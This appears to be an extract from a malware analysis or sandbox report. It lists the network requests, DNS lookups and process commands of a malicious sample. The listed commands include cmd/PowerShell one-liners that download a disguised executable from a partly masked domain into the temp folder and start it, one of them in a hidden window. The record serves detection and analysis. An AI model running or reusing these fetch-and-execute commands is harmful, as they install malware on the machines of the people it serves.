Technical Information
- http://li####gcheng.net/wp-content/uploads/8/10656307.png as %temp%\fgfgr.exe
- http://li####gcheng.net/wp-content/uploads/8/10656307.png
- http://ca#####.##gitalcertvalidation.com/TrustAsiaTLSRSACA.crt
- DNS ASK li####gcheng.net
- DNS ASK ca#####.##gitalcertvalidation.com
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://li####gcheng.net/wp-content/uploads/8/10656307.png','%temp%\fgfgr.exe'); Start '%temp%\fgfgr.exe'' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://li####gcheng.net/wp-content/uploads/8/10656307.png','%temp%\fgfgr.exe'); Start '%temp%\fgfgr.exe'